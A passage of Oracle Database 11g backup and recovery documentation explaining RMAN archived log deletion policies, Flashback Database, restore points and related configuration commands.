If the deletion policy is configured with the BACKED UP integer TIMES clause, then a BACKUP ARCHIVELOG command copies the logs unless integer backups already exist on the specified device type. If integer backups of the logs exist, then the BACKUP ARCHIVELOG command skips the logs. In this way, the archived log deletion policy functions as a default NOT BACKED UP integer TIMES clause on the BACKUP ARCHIVELOG command. You can override the deletion policy by specifying the FORCE option on the BACKUP command.
The archived log deletion policy also has options specific to a Data Guard environment. For example, if you specify the APPLIED ON STANDBY clause, then RMAN can delete logs after they have been applied at all mandatory remote destinations. If you specify SHIPPED TO STANDBY, for example, then RMAN can delete logs when they have been transferred to all mandatory standby destinations.
See Also:
Enabling an Archived Redo Log Deletion Policy
This section explains how to configure an archived redo log deletion policy. By default the policy is set to NONE.
To enable an archived redo log deletion policy:
1. Start RMAN and connect to a target database and a recovery catalog (if used).
2. Run the CONFIGURE ARCHIVELOG DELETION POLICY command with the desired options.
The following example specifies that archived redo logs are eligible to be deleted from the fast recovery area and all local archiving destinations when logs have been backed up at least twice tape:
CONFIGURE ARCHIVELOG DELETION POLICY
TO BACKED UP 2 TIMES TO SBT;
See Also:
Configuring Oracle Flashback Database and Restore Points
This section describes how to plan and configure the environment for Oracle Flashback Database. This section also explains how to create restore points. This section contains the following topics:
About Restore Points and Flashback Database
Oracle Flashback Database and restore points are related data protection features. These features provide more efficient alternatives to point-in-time recovery for reversing unwanted database changes. Flashback Database enables you to rewind an entire database backward in time, reversing the effects of database changes within a time window. The effects are similar to database point-in-time recovery (DBPITR).
Restore points provide capabilities related to Flashback Database and other media recovery operations. In particular, a guaranteed restore point created at an SCN ensures that you can use Flashback Database to rewind the database to this SCN. You can use restore points and Flashback Database independently or together.
Flashback Database
Oracle Flashback Database is accessible through the RMAN command FLASHBACK DATABASE or through the SQL statement FLASHBACK DATABASE. You can use either command to quickly recover the database from logical data corruptions or user errors.
Flashback Database is similar to conventional point-in-time recovery in its effects, enabling you to return a database to its state at a time in the recent past. Flashback Database is much faster than point-in-time recovery, however, because it does not require restoring datafiles from backup and requires applying fewer changes from the archived redo logs.
You can use Flashback Database to reverse most unwanted changes to a database as long as the datafiles are intact. You can return a database to its state in a previous incarnation, and undo the effects of an ALTER DATABASE OPEN RESETLOGS statement. "Rewinding a Database with Flashback Database" explains how to use the FLASHBACK DATABASE command to reverse database changes.
Flashback Database uses its own logging mechanism, creating flashback logs and storing them in the fast recovery area. You can only use Flashback Database if flashback logs are available. Thus, to take advantage of this feature you must set up your database in advance to create flashback logs.
To enable Flashback Database, you configure a fast recovery area and set a flashback retention target. This retention target specifies how far back you can rewind a database with Flashback Database. From the target time onwards, the database regularly copies images of every changed block in the datafiles to the flashback logs.
When you use Flashback Database to rewind a database to a past target time, the command determines which blocks changed after the target time and restores them from the flashback logs. The database restores the version of each block that is most immediately prior to the target time. The database then uses redo logs to reapply changes that were made after these blocks were written to the flashback logs.
Redo logs on disk or tape must be available for the entire time period spanned by the flashback logs. For example, if the flashback retention target is one week, then you must ensure that online and archived redo logs that contain all changes for the past week are accessible. In practice, redo logs are typically needed much longer than the flashback retention target to support point-in-time recovery.
About the Flashback Database Window
The range of SCNs for which there is currently enough flashback log data to support the FLASHBACK DATABASE command is called the flashback database window. The flashback database window cannot extend further back than the earliest SCN in the available flashback logs.
Note:
Some database operations, such as dropping a tablespace or shrinking a datafile, cannot be reversed with Flashback Database. In these cases the flashback database window begins at the time immediately following that operation.
You cannot back up flashback logs to locations outside the fast recovery area. To increase the likelihood that enough flashback logs are retained to meet the flashback database window, you can increase the space in your fast recovery area (see "Setting the Fast Recovery Area Location and Initial Size").
If the fast recovery area is not large enough to hold the flashback logs and files such as archived redo logs and other backups needed for the retention policy, then the database may delete flashback logs from the earliest SCNs to make room for other files. Consequently, the flashback database window can be shorter than the flashback retention target, depending on the size of the fast recovery area, other backups that must be retained, and how much flashback logging data is needed. The flashback retention target is a target, not a guarantee that Flashback Database is available.
If you cannot use FLASHBACK DATABASE because the flashback database window is not long enough, then you can use database point-in-time recovery (DBPITR) in most cases to achieve a similar result. Guaranteed restore points are the only way to ensure that you can use Flashback Database to return to a specific point in time or guarantee the size of the flashback window.
See Also:
Limitations of Flashback Database
Because Flashback Database works by undoing changes to the datafiles that exist at the moment that you run the command, it has the following limitations:
• Flashback Database can only undo changes to a datafile made by an Oracle database. It cannot be used to repair media failures, or to recover from accidental deletion of datafiles.
• You cannot use Flashback Database to undo a shrink datafile operation. However, you can take the shrink file offline, flashback the rest of the database, and then later restore and recover the shrink datafile
• You can not use Flashback Database alone to get back a dropped datafile. If you flashback a database to a time when a dropped datafile existed in the database, Oracle will only add the datafile entry in the controlfile. You can recover the dropped datafile by further restoring and recovering the datafile.
• If the database control file is restored from backup or re-created, all accumulated flashback log information is discarded. You cannot use FLASHBACK DATABASE to return to a point in time before the restore or re-creation of a control file
• When using Flashback Database with a target time at which a NOLOGGING operation was in progress, block corruption is likely in the database objects and datafiles affected by the NOLOGGING operation. For example, if you perform a direct-path INSERT operation in NOLOGGING mode, and that operation runs from 9:00 to 9:15 on April 3, 2005, and you later need to use Flashback Database to return to the target time 09:07 on that date, the objects and datafiles updated by the direct-path INSERT may be left with block corruption after the Flashback Database operation completes.
If possible, avoid using Flashback Database with a target time or SCN that coincides with a NOLOGGING operation. Also, perform a full or incremental backup of the affected datafiles immediately after any NOLOGGING operation to ensure recoverability to points in time after the operation. If you expect to use Flashback Database to return to a point in time during an operation such as a direct-path INSERT, consider performing the operation in LOGGING mode.
See the discussion of logging_clause in Oracle Database SQL Reference for more information about operations that support NOLOGGING mode.
Normal Restore Points
A normal restore point assigns a restore point name to an SCN or specific point in time. Thus, a restore point functions as a bookmark or alias for this SCN. Before performing any operation that you may have to reverse, you can create a normal restore point. The control file stores the name of the restore point and the SCN.
If you need to use flashback features or point-in-time recovery, then you can use the name of the restore point instead of a time or SCN. The following commands support this use of restore points:
A normal restore point eliminates the need to manually record an SCN in advance or determine the correct SCN after the fact by using features such as Flashback Query.
Normal restore points are lightweight. The control file can maintain a record of thousands of normal restore points with no significant impact on database performance. Normal restore points eventually age out of the control file if not manually deleted, so they require no ongoing maintenance.
See Also:
Oracle Database Advanced Application Developer's Guide to learn how to use Flashback Query
Guaranteed Restore Points
Like a normal restore point, a guaranteed restore point serves as an alias for an SCN in recovery operations. A principal difference is that guaranteed restore points never age out of the control file and must be explicitly dropped. In general, you can use a guaranteed restore point as an alias for an SCN with any command that works with a normal restore point. Except as noted, the information about where and how to use normal restore points applies to guaranteed restore points as well.
A guaranteed restore point ensures that you can use Flashback Database to rewind a database to its state at the restore point SCN, even if the generation of flashback logs is disabled. If flashback logging is enabled, then a guaranteed restore point enforces the retention of flashback logs required for Flashback Database to any SCN after the earliest guaranteed restore point. Thus, if flashback logging is enabled, you can rewind the database to any SCN in the continuum rather than to a single SCN only.
Caution:
If flashback logging is disabled, then you cannot use FLASHBACK DATABASE to rewind the database to SCNs between the guaranteed restore points and the current time. In this case, your only option to return the database to an intermediate SCN is DBPITR.
If the recovery area has enough disk space to store the needed logs, then you can use a guaranteed restore point to rewind a whole database to a known good state days or weeks ago. As with Flashback Database, even the effects of NOLOGGING operations like direct load inserts can be reversed with guaranteed restore points.
Note:
Limitations that apply to Flashback Database also apply to guaranteed restore points. For example, shrinking a datafile or dropping a tablespace can prevent flashing back the affected datafiles to the guaranteed restore point. See the FLASHBACK DATABASE entry in Oracle Database Backup and Recovery Reference for a complete list of command prerequisites and usage notes.
Guaranteed Restore Points and Storage Snapshots
In practice, guaranteed restore points provide a useful alternative to storage snapshots. Storage snapshots are often used to protect a database before risky operations such as large-scale database updates or application patches or upgrades. Rather than creating a snapshot or duplicate database to test the operation, you can create a guaranteed restore point on a primary or physical standby database. You can then perform the risky operation with the certainty that the required flashback logs are retained.
Logging for Flashback Database and Guaranteed Restore Points
Logging for Flashback Database and guaranteed restore points involves capturing images of datafile blocks before changes are applied. The FLASHBACK DATABASE command can use these images to return the datafiles to their previous state.
The chief differences between normal flashback logging and logging for guaranteed restore points are related to when blocks are logged and whether the logs can be deleted in response to space pressure in the fast recovery area. These differences affect space usage for logs and database performance.
Your recoverability goals partially determine whether to enable logging for flashback database, use guaranteed restore points, or both. The implications in performance and in space usage for these features, separately and when used together, should also factor into your decision.
Guaranteed Restore Points and Fast Recovery Area Space Usage
The following rules govern creation, retention, overwriting and deletion of flashback logs in the fast recovery area:
• If the fast recovery area has enough space, then a flashback log is created whenever necessary to satisfy the flashback retention target.
• If a flashback log is old enough that it is no longer needed to satisfy the flashback retention target, then a flashback log is reused.
• If the database must create a new flashback log and the fast recovery area is full or there is no disk space, then the oldest flashback log is reused instead.
Note:
Reusing the oldest flashback log shortens the flashback database window. If enough flashback logs are reused due to a lack of disk space, then the flashback retention target may not be satisfied.
• If the fast recovery area is full, then an archived redo log that is reclaimable according to the FRA rules may be automatically deleted by the fast recovery area to make space for other files. In this case, any flashback logs that would require the use of that redo log file for the use of FLASHBACK DATABASE are also deleted.
• Note:
According to FRA rules, a file is reclaimable when one of the following criteria is true:
• The file is reported as obsolete and not needed by the flashback database. For example, the file is outside the DB_FLASHBACK_RETENTION_TARGET parameters. The file is backed up to tape.
• No file in the fast recovery area is eligible for deletion if it is required to satisfy a guaranteed restore point. Thus, retention of flashback logs and other files required to satisfy the guaranteed restore point, in addition to files required to satisfy the backup retention policy, can cause the fast recovery area to fill completely. Consult "Responding to a Full Fast Recovery Area" if your fast recovery area becomes full.
When you create a guaranteed restore point, with or without enabling full flashback database logging, you must monitor the space available in your fast recovery area. "Managing Space For Flashback Logs in the Fast Recovery Area" explains how to monitor fast recovery area disk space usage.
Caution:
If no files are eligible for deletion from the fast recovery area because of the requirements imposed by your retention policy and the guaranteed restore point, then the database behaves as if it has encountered a disk full condition. In many circumstances, this causes your database to halt. See "Responding to a Full Fast Recovery Area".
Logging for Guaranteed Restore Points With Flashback Logging Disabled
Assume that you create a guaranteed restore point when logging for Flashback Database is disabled. In this case, the first time a datafile block is modified after the time of the guaranteed restore point, the database stores an image of the block before the modification in the flashback logs. Thus, the flashback logs preserve the contents of every changed data block at the time that the guaranteed restore point was created. Later modifications to the same block do not cause the contents to be logged again unless another guaranteed restore point was created after the block was last modified.
This method of logging has the following important consequences:
• FLASHBACK DATABASE can re-create the datafile contents at the time of a guaranteed restore point by means of the block images.
• For workloads that repeatedly modify the same data, disk space usage can be less than normal flashback logging. Less space is needed because each changed block is only logged once. Applications with low volume inserts may benefit from this disk space saving while this advantage is less likely for applications with high volume inserts or large batch inserts. The performance overhead of logging for a guaranteed restore point without flashback database logging enabled can also be lower.
Assume that your primary goal is the ability to return your database to the time at which the guaranteed restore point was created. In this case, it is usually more efficient to turn off flashback logging and use only guaranteed restore points. For example, suppose that you are performing an application upgrade on a database host over a weekend. You could create a guaranteed restore point at the start of the upgrade. If the upgrade fails, then reverse the changes with FLASHBACK DATABASE.
Logging for Flashback Database With Guaranteed Restore Points Defined
If you enable Flashback Database and define one or more guaranteed restore points, then the database performs normal flashback logging. In this case, the recovery area retains the flashback logs required to flash back to any arbitrary time between the present and the earliest currently defined guaranteed restore point. Flashback logs are not deleted in response to space pressure if they are required to satisfy the guarantee.
Flashback logging causes some performance overhead. Depending upon the pattern of activity on your database, it can also cause significant space pressure in the fast recovery area. Thus, you should monitor space used in the fast recovery area.
Prerequisites for Flashback Database and Guaranteed Restore Points
The prerequisites for enabling Flashback Database are the following:
• Your database must be running in ARCHIVELOG mode, because archived logs are used in the Flashback Database operation.
• You must have a fast recovery area enabled, because flashback logs can only be stored in the fast recovery area.
• For Real Application Clusters databases, the fast recovery area must be stored in a clustered file system or in ASM.
To support the use of guaranteed restore points, the database must satisfy the following prerequisites:
• The COMPATIBLE initialization parameter must be set to 10.2 or greater.
• The database must be running in ARCHIVELOG mode.
To rewind your database to a guaranteed restore point, the FLASHBACK DATABASE command requires the use of archived redo logs starting from around the time of the restore point.
• A fast recovery area must be configured, as described in "Configuring the Fast Recovery Area".
Guaranteed restore points use a mechanism similar to flashback logging. As with flashback logging, Oracle Database must store the required logs in the fast recovery area.
• If Flashback Database is not enabled, then the database must be mounted or open when creating the first guaranteed restore point (or if all previously created guaranteed restore points have been dropped) from an instance. Other instances in a RAC set up can be in any state.
Note:
No special requirements exist for using normal restore points.
Enabling Flashback Database
To enable logging for Flashback Database:
To enable flashback logging:
1. Ensure a database instance is open or mounted. If the instance is mounted, then the database must be shut down cleanly unless it is a physical standby database. Other RAC instances can be in any mode.
2. Optionally, set the DB_FLASHBACK_RETENTION_TARGET to the length of the desired flashback window in minutes:
ALTER SYSTEM SET DB_FLASHBACK_RETENTION_TARGET=4320; # 3 days
By default DB_FLASHBACK_RETENTION_TARGET is set to one day (1440 minutes).
3. Enable the Flashback Database feature for the whole database:
ALTER DATABASE FLASHBACK ON;
4. Optionally, disable flashback logging for specific tablespaces.
By default, flashback logs are generated for all permanent tablespaces. If you want, you can reduce overhead by disabling flashback logging for specific tablespaces as in the following example:
ALTER TABLESPACE tbs_3 FLASHBACK OFF;
You can re-enable flashback logging for a tablespace later with this command:
ALTER TABLESPACE tbs_3 FLASHBACK ON;
If you disable Flashback Database for a tablespace, then you must take its datafiles offline before running FLASHBACK DATABASE.
When enabling Flashback Database while the database is open, there is a very small chance the command may not be able to obtain the memory it needs. If the command fails because of that reason, retry the command after a while or retry after a shutdown and restart of the instance.
When you enable Flashback Database on a physical standby database, you can flash back a standby database. Flashback Database of standby databases has a number of applications in the Data Guard environment. See Oracle Data Guard Concepts and Administration for details.
Disabling Flashback Database
To disable flashback logging:
On one of the database instances that is either in mount or open state, issue the following command:
ALTER DATABASE FLASHBACK OFF;
Creating Normal and Guaranteed Restore Points
To create normal or guaranteed restore points, use the CREATE RESTORE POINT SQL statement, providing a name for the restore point and specifying whether it is to be a guaranteed restore point or a normal one (the default).
To create a restore point:
1. Connect SQL*Plus to a target database.
2. Ensure that the database is open or mounted. If the database is mounted, then it must have been shut down cleanly (unless it is a physical standby database).
3. Run the CREATE RESTORE POINT statement.
The following example shows how to create a normal restore point in SQL*Plus:
SQL> CREATE RESTORE POINT before_upgrade;
This example shows how to create a guaranteed restore point:
SQL> CREATE RESTORE POINT before_upgrade GUARANTEE FLASHBACK DATABASE;
See Also:
Configuring the Environment for Optimal Flashback Database Performance
Maintaining flashback logs imposes comparatively limited overhead on an Oracle database instance. Changed blocks are written from memory to the flashback logs at relatively infrequent, regular intervals, to limit processing and I/O overhead.
To achieve good performance for large production databases with Flashback Database enabled, Oracle recommends the following:
• Use a fast file system for your fast recovery area, preferably without operating system file caching.
Files that the database creates in the fast recovery area, including flashback logs, are typically large. Operating system file caching is typically not effective for these files, and may actually add CPU overhead for reading from and writing to these files. Thus, it is recommended to use a file system that avoids operating system file caching, such as ASM.
• Configure enough disk spindles for the file system that holds the fast recovery area.
For large production databases, multiple disk spindles may be needed to support the required disk throughput for the database to write the flashback logs effectively.
• If the storage system used to hold the fast recovery area does not have nonvolatile RAM, then try to configure the file system on striped storage volumes.
Use a relatively small stripe size such as 128 KB. This technique enables each write to the flashback logs to be spread across multiple spindles, improving performance.
• For large databases, set the initialization parameter LOG_BUFFER to at least 8 MB.
This setting ensures that the database allocates maximum memory (typically 16MB) for writing flashback database logs.
The overhead of logging for Flashback Database depends on the mixture of reads and writes in the database workload. The more write-intensive the workload, the higher the overhead caused by turning on logging for Flashback Database. Queries do not change data and thus do not contribute to logging activity for Flashback Database.
Configuring RMAN in a Data Guard Environment
If you use RMAN in a Data Guard environment, then you can use the CONFIGURE command to register and configure settings for the physical databases in this environment. RMAN uses the DB_UNIQUE_NAME initialization parameter to distinguish one database from another. Thus, it is critical that you maintain the uniqueness of the DB_UNIQUE_NAME in the Data Guard environment.
RMAN must be connected to a recovery catalog when you create or alter a configuration for a database in the Data Guard environment. If you use the SET DBID command to set the DBID in the RMAN session, then you can configure a standby database even when RMAN is not connected as TARGET to a database in the Data Guard environment. You can even create a configuration for a standby database that has not yet been created.
You can use the following forms of the CONFIGURE command:
A Data Guard environment involves many considerations that are only relevant for Data Guard. For example, you can configure an archived redo log deletion policy based on whether archived logs are transferred to or applied on a standby database.
See Also:
As an Amazon Associate I earn from qualifying purchases.
|
{
"url": "https://oracle.su/docs/11g/backup.112/e10642/rcmconfb.htm",
"source_domain": "oracle.su",
"snapshot_id": "crawl=CC-MAIN-2021-04",
"warc_metadata": {
"Content-Length": "170869",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:7SHWO72O4HQ2NEUNYME6TWGA2LCMOGNB",
"WARC-Concurrent-To": "<urn:uuid:d14a02f9-bac2-4b1d-b063-497d74b0e346>",
"WARC-Date": "2021-01-19T06:01:01Z",
"WARC-IP-Address": "92.53.96.93",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:3W5NV47ZXWZFW5KBCXKCBKODDBCDKG4N",
"WARC-Record-ID": "<urn:uuid:b5c9938f-bbdb-4408-a983-575c8f75bbf2>",
"WARC-Target-URI": "https://oracle.su/docs/11g/backup.112/e10642/rcmconfb.htm",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:6cd4a4d8-8991-4957-8f20-41744c9bf6ba>"
},
"warc_info": "isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-59.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
13,
63,
84,
85,
107,
132,
137,
153,
163,
187,
196,
208,
214,
233,
246,
266,
277,
278,
298,
307,
323,
328,
337,
338,
373,
374,
491,
492,
498,
499,
634,
635,
645,
646,
819,
820,
865,
866,
1127,
1128,
1516,
1517,
1780,
1781,
1787,
1788,
1946,
1947,
1991,
1992,
2002,
2003,
2070,
2071,
2123,
2124,
2319,
2320,
2371,
2372,
2455,
2456,
2488,
2489,
2886,
2887,
2920,
2921,
2935,
2940,
3018,
3079,
3117,
3170,
3211,
3299,
3383,
3471,
3552,
3630,
3704,
3784,
3860,
3936,
3985,
4038,
4093,
4153,
4239,
4244,
4245,
4411,
4412,
4439,
4469,
4474,
4613,
4614,
4655,
4693,
4765,
4770,
4771,
4827,
4828,
5037,
5038,
5205,
5206,
5262,
5263,
5283,
5284,
5322,
5323,
5376,
5377,
5560,
5561,
6138,
6139,
6176,
6177,
6230,
6231,
6492,
6493,
6494,
6628,
6629,
6662,
6696,
6697,
6743,
6744,
6827,
6828,
6907,
6908,
6997,
6998,
7008,
7009,
7128,
7129,
7193,
7194,
7489,
7490,
7496,
7497,
7599,
7600,
7965,
7966,
8007,
8008,
8091,
8092,
8163,
8164,
8261,
8262,
8329,
8401,
8406,
8407,
8473,
8474,
8542,
8609,
8614,
8615,
8636,
8637,
8785,
8786,
8814,
8815,
9171,
9172,
9178,
9179,
9339,
9340,
9689,
9690,
9742,
9793,
9794,
9824,
9825,
10133,
10134,
10187,
10188,
10257,
10258,
10423,
10424,
10430,
10431,
10640,
10641,
10719,
10720,
10774,
10775,
10785,
10786,
10853,
10854,
10911,
10912,
11478,
11479,
11721,
11722,
11947,
11948,
12002,
12003,
12050,
12051,
12086,
12170,
12205,
12289,
12347,
12348,
12467,
12468,
12526,
12527,
12585,
12587,
12622,
12706,
12741,
12814,
12872,
12873,
13211,
13212,
13222,
13223,
13263,
13264,
13463,
13464,
13469,
13471,
13511,
13538,
13540,
13541,
13756,
13757,
13767,
13768,
13831,
13832,
14346,
14347,
14780,
14781,
14853,
14854,
14891,
14892,
14954,
14955,
14993,
14994,
15004,
15005,
15072,
15073,
15120,
15121,
15353,
15354,
15390,
15391,
15456,
15457,
15537,
15538,
15793,
15794,
15835,
15882,
15883,
16039,
16040,
16081,
16126,
16127,
16231,
16232,
16273,
16314,
16315,
16398,
16399,
16467,
16534,
16535,
16721,
16722,
16728,
16729,
16872,
16873,
16930,
16931,
17151,
17152,
17212,
17213,
17269,
17270,
17315,
17316,
17409,
17410,
17486,
17511,
17515,
17518,
17594,
17617,
17639,
17653,
17655,
17656,
17995,
17996,
18048,
18049,
18449,
18450,
18920,
18921,
18994,
18995,
19050,
19051,
19113,
19114,
19174,
19175,
19246,
19247,
19306,
19307,
19321,
19322,
19420,
19421,
19471,
19472,
19687,
19688,
20186,
20187,
20542,
20543,
20600,
20601,
20960,
20961,
21065,
21066,
21100,
21132,
21133,
21271,
21272,
21443,
21444,
21495,
21496,
21558,
21559,
21659,
21660,
21704,
21705,
21778,
21779,
21997,
21998,
22283,
22284,
22290,
22291,
22457,
22458,
22468,
22469,
22653,
22654,
22709,
22710,
23008,
23009,
23377,
23378,
23585,
23586,
23637,
23638,
23679,
23724,
23725,
23735,
23736,
23802,
23803,
23954,
23955,
24001,
24002,
24136,
24137,
24186,
24187,
24270,
24271,
24368,
24369,
24444,
24445,
24453,
24459,
24501,
24550,
24611,
24617,
24622,
24652,
24653,
24851,
24852,
24928,
25004,
25080,
25161,
25238,
25293,
25324,
25329,
25330,
25580,
25581,
25775,
25776,
25966,
25967,
26017,
26092,
26140,
26141,
26151,
26152,
26277,
26278,
26337,
26338,
26722,
26723,
26780,
26781,
26785,
26787,
26825,
26870,
26927,
26944,
27008,
27040,
27042,
27043,
27235,
27236,
27294,
27295,
27299,
27301,
27339,
27384,
27441,
27490,
27554,
27612,
27614,
27615,
27763,
27764,
27786,
27787,
28066,
28067,
28145,
28146,
28442,
28443,
28497,
28498,
28700,
28701,
28740,
28741,
29046,
29047,
29520,
29521,
29930,
29931,
30246,
30247,
30257,
30258,
30293,
30294,
30527,
30528,
30580,
30581,
30619,
30620,
30856,
30857,
30896,
30963,
30968,
31050,
31051,
31093,
31098,
31099,
31346,
31347,
31392,
31397,
31398,
31481,
31482,
31520,
31525,
31558,
31559,
31629,
31630,
31649,
31654,
31738,
31739,
31766,
31771,
31772,
31807,
31808,
32161,
32162,
32401,
32402,
32437,
32438,
32883,
32884,
33173,
33174,
33328,
33329,
33371,
33372,
33441,
33442,
33489,
33490,
33500,
33501,
33717,
33718,
33826,
33827,
33849,
33850,
33860,
33861,
34037,
34038,
34152,
34153,
34177,
34178,
34188,
34189,
34397,
34398,
34516,
34517,
34549,
34550,
34560,
34561,
34600,
34601,
34864,
34865,
34909,
34910,
34920,
34921,
34960,
34961,
34975,
34976,
34986,
34987,
35026,
35027,
35042,
35043,
35053,
35054,
35399,
35400,
35877,
35878,
35959,
35960,
35961,
36232,
36233,
36287,
36288,
36577,
36578,
37003,
37004,
37169,
37170,
37226,
37227,
37822,
37823,
37855,
37856,
38042,
38043,
38247,
38248,
38348,
38349,
38563,
38564,
38627,
38628,
38674,
38675,
38702,
38703,
38707,
38708,
38885,
38886,
38980,
38981,
39067,
39068,
39179,
39180,
39371,
39372,
39793,
39794,
39816,
39817,
39821,
39822,
39988,
39989,
40019,
40020,
40023,
40024,
40177,
40178,
40541,
40542,
40543,
40553,
40554,
40731,
40732,
40795,
40796,
41108,
41109,
41591,
41592,
41668,
41669,
41753,
41754,
41810,
41811,
41911,
41912,
42053,
42054,
42659,
42660,
43105,
43106,
43119,
43148,
43180,
43223,
43296,
43319,
43378,
43448,
43449,
43516,
43517,
43857,
43858,
44130,
44131,
44240,
44241,
44371,
44372,
44483,
44484,
44737,
44738,
44795,
44796,
44990,
44991,
45049,
45050,
45268,
45269,
45302,
45303,
45552,
45553,
45720,
45721,
45760,
45767,
45889,
45890,
45914,
45956,
45984,
45991,
46054,
46055,
46092,
46093,
46162,
46163,
46284,
46285,
46339,
46346,
46484,
46485,
46508,
46550,
46578,
46585,
46652,
46653,
46804,
46805,
46953,
46954,
47040,
47041,
47098,
47099,
47136,
47173,
47178,
47179,
47351,
47352,
47534,
47535,
47568,
47569,
47724,
47725,
47823,
47824,
47858,
47863,
48021,
48022,
48167,
48168,
48228,
48233,
48298,
48303,
48365,
48366,
48414,
48419,
48420,
48474,
48475,
48716,
48717,
48755,
48756,
49138,
49139,
49223,
49224,
49373,
49374,
49409,
49410,
49785,
49786,
50162,
50163,
50203,
50204,
50609,
50610,
50711,
50712,
50855,
50856,
51085,
51086,
51237,
51238,
51432,
51433,
51540,
51541,
51878,
51879,
52138,
52139,
52149,
52150,
52242,
52243,
52300,
52301,
52544,
52545,
52556,
52557,
52927,
52928,
52956,
52957,
53313,
53314,
53337,
53338,
53597,
53598,
53684,
53685,
53960,
53961,
54221,
54222,
54262,
54263,
54555,
54556,
54566,
54567,
54634,
54635,
54683,
54684,
55061,
55062,
55263,
55264,
55573,
55574,
56176,
56177,
56269,
56270,
56314,
56315,
56368,
56369,
56775,
56776,
56929,
56930,
56987,
56988,
57254,
57255,
57286,
57287,
57424,
57425,
57461,
57462,
57624,
57625,
57864,
57865,
57871,
57872,
58377,
58378,
58410,
58411,
58637,
58638,
58670,
58671,
58956,
58957,
59007,
59008,
59061,
59062,
59071,
59072,
59270,
59271,
59284,
59285,
59349,
59350,
59361,
59362,
59405,
59406,
59407,
59780,
59781,
59851,
59852,
59945,
59946,
60113,
60114,
60124,
60125,
60329,
60434,
60435,
60441,
60442,
60686,
60687,
60838,
60839,
60888,
60926,
60927,
61166,
61167,
61289,
61290,
61313,
61342,
61343,
61353,
61354,
61483,
61484,
61552,
61553,
61788,
61789,
61795,
61796,
62143,
62144,
62218,
62219,
62501,
62502,
62528,
62529,
62564,
62565,
62634,
62635,
62670,
62671,
62949,
62950,
63269,
63270,
63339,
63340,
63585,
63586,
63682,
63683,
63721,
63755,
63799,
63800,
64065,
64066,
64128,
64129,
64164,
64165,
64172,
64173,
64200,
64201,
64205,
64206,
64214,
64215,
64231,
64232,
64267,
64268,
64270,
64271,
64281,
64282,
64298,
64299,
64334,
64335,
64337,
64338,
64347,
64348,
64364,
64365,
64400,
64401,
64416,
64417,
64424,
64425,
64441,
64442,
64481,
64482,
64497,
64498,
64507,
64508,
64524,
64525,
64564,
64565,
64580,
64581,
64588,
64589,
64605,
64606,
64637,
64638,
64640,
64641,
64648,
64649,
64665,
64666,
64701,
64702,
64719,
64720,
64721,
65060,
65061,
65433,
65434,
65466,
65467,
65623,
65624,
65658,
65659,
65742,
65743,
65845,
65846,
65892,
65893,
65923,
65928,
65929,
65985,
65986,
66064,
66102,
66107,
66173,
66174,
66212,
66217,
66218,
66228,
66229,
66316,
66317,
66366,
66367,
66495,
66496,
66538,
66539,
66756,
66757,
67300,
67301,
67356,
67357,
68039,
68040,
68050,
68051,
68105,
68106,
68414,
68415,
68927,
68928,
69313,
69314,
69324,
69325,
69371,
69372,
69487,
69488,
69536,
69537,
69620,
69621,
69705,
69706,
69909,
69910,
69951,
69986,
69991,
69992,
70002,
70003,
70060,
70061,
70258,
70259,
70303,
70304,
70716,
70717,
71037,
71038,
71057,
71058,
71296,
71297,
71656,
71657,
72033,
72034,
72329,
72330,
72659,
72660,
73066,
73067,
73471,
73472,
73508,
73509,
73777,
73778,
73784,
73785,
74012,
74013,
74318,
74319,
74904,
74905,
75275,
75276,
75286,
75287,
75321,
75322,
75476,
75477,
75661,
75662,
75875,
75876,
76187,
76188,
76431,
76432,
77011,
77012,
77470,
77471,
77608,
77609,
77631,
77632,
77958,
77959,
78156,
78157,
78324,
78325,
78619,
78620,
78630,
78631,
78722,
78723,
78749,
78750,
79242,
79243,
79751,
79752,
79761,
79762,
80014,
80015,
80338,
80339,
80345,
80346,
80717,
80765,
80766,
81277,
81278,
81339,
81340,
81575,
81576,
81876,
81877,
82158,
82159,
82220,
82221,
82339,
82340,
82482,
82483,
82623,
82624,
82787,
82788,
82798,
82799,
82999,
83331,
83332,
83342,
83343,
83437,
83628,
83629,
84063,
84064,
84354,
84355,
84364,
84365,
84705,
84775,
84776,
85374,
85375,
85440,
85441,
85572,
85573,
86066,
86067,
86560,
86561,
86631,
86632,
87061,
87062,
87306,
87307,
87374,
87375,
87444,
87445,
87567,
87568,
87685,
87686,
87807,
87808,
87912,
87913,
87989,
87990,
88043,
88044,
88225,
88226,
88325,
88326,
88501,
88502,
88781,
88782,
88788,
88789,
88852,
88853,
88881,
88882,
88924,
88925,
88954,
88955,
89161,
89162,
89275,
89276,
89342,
89347,
89348,
89427,
89428,
89495,
89496,
89529,
89534,
89603,
89604,
89802,
89803,
89845,
89850,
89851,
89933,
89934,
89975,
89980,
89981,
90113,
90114,
90395,
90396,
90665,
90666,
90695,
90696,
90726,
90727,
90828,
90829,
90859,
90860,
90906,
90907,
91130,
91131,
91158,
91159,
91203,
91204,
91367,
91368,
91413,
91414,
91496,
91497,
91543,
91548,
91549,
91614,
91615,
91690,
91695,
91696,
91706,
91707,
91778,
91779,
92021,
92022,
92147,
92148,
92254,
92255,
92619,
92620,
92710,
92711,
92882,
92883,
93042,
93043,
93216,
93217,
93304,
93305,
93427,
93428,
93758,
93759,
93804,
93805,
94175,
94176,
94596,
94597,
94655,
94656,
94901,
94902,
94912,
94913
],
"line_end_idx": [
13,
63,
84,
85,
107,
132,
137,
153,
163,
187,
196,
208,
214,
233,
246,
266,
277,
278,
298,
307,
323,
328,
337,
338,
373,
374,
491,
492,
498,
499,
634,
635,
645,
646,
819,
820,
865,
866,
1127,
1128,
1516,
1517,
1780,
1781,
1787,
1788,
1946,
1947,
1991,
1992,
2002,
2003,
2070,
2071,
2123,
2124,
2319,
2320,
2371,
2372,
2455,
2456,
2488,
2489,
2886,
2887,
2920,
2921,
2935,
2940,
3018,
3079,
3117,
3170,
3211,
3299,
3383,
3471,
3552,
